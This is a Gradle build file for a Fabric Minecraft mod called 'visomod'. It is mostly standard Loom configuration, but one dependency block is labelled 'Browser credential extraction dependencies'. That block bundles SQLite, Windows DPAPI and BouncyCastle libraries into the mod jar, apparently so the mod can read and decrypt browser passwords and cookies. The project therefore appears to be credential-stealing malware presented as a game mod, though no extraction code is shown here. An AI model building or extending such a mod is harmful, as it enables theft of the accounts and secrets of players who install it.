plugins {
	id 'fabric-loom' version "${loom_version}"
	id 'maven-publish'
}

version = project.mod_version
group = project.maven_group

base {
	archivesName = project.archives_base_name
}

repositories {
	mavenCentral()
	maven {
		name = "jitpack"
		url = "https://jitpack.io"
	}
}

loom {
	mods {
		"visomod" {
			sourceSet sourceSets.main
		}
	}
}

dependencies {
	// To change the versions see the gradle.properties file
	minecraft "com.mojang:minecraft:${project.minecraft_version}"
	mappings "net.fabricmc:yarn:${project.yarn_mappings}:v2"
	modImplementation "net.fabricmc:fabric-loader:${project.loader_version}"

	// Fabric API
	modImplementation "net.fabricmc.fabric-api:fabric-api:${project.fabric_version}"
	
	// Browser credential extraction dependencies
	implementation 'org.xerial:sqlite-jdbc:3.47.1.0'
	include 'org.xerial:sqlite-jdbc:3.47.1.0'
	
	implementation 'com.github.peter-gergely-horvath:windpapi4j:2.1.0'
	include 'com.github.peter-gergely-horvath:windpapi4j:2.1.0'
	
	implementation 'com.google.code.gson:gson:2.11.0'
	include 'com.google.code.gson:gson:2.11.0'
	
	implementation 'org.bouncycastle:bcprov-jdk18on:1.79'
	include 'org.bouncycastle:bcprov-jdk18on:1.79'
}

processResources {
	inputs.property "version", project.version

	filesMatching("fabric.mod.json") {
		expand "version": inputs.properties.version
	}
}

tasks.withType(JavaCompile).configureEach {
	it.options.release = 21
}

java {
	withSourcesJar()
	sourceCompatibility = JavaVersion.VERSION_21
	targetCompatibility = JavaVersion.VERSION_21
}

jar {
	inputs.property "archivesName", project.base.archivesName

	from("LICENSE") {
		rename { "${it}_${inputs.properties.archivesName}"}
	}
}

// configure the maven publication
publishing {
	publications {
		create("mavenJava", MavenPublication) {
			artifactId = project.archives_base_name
			from components.java
		}
	}

	repositories {
	}
}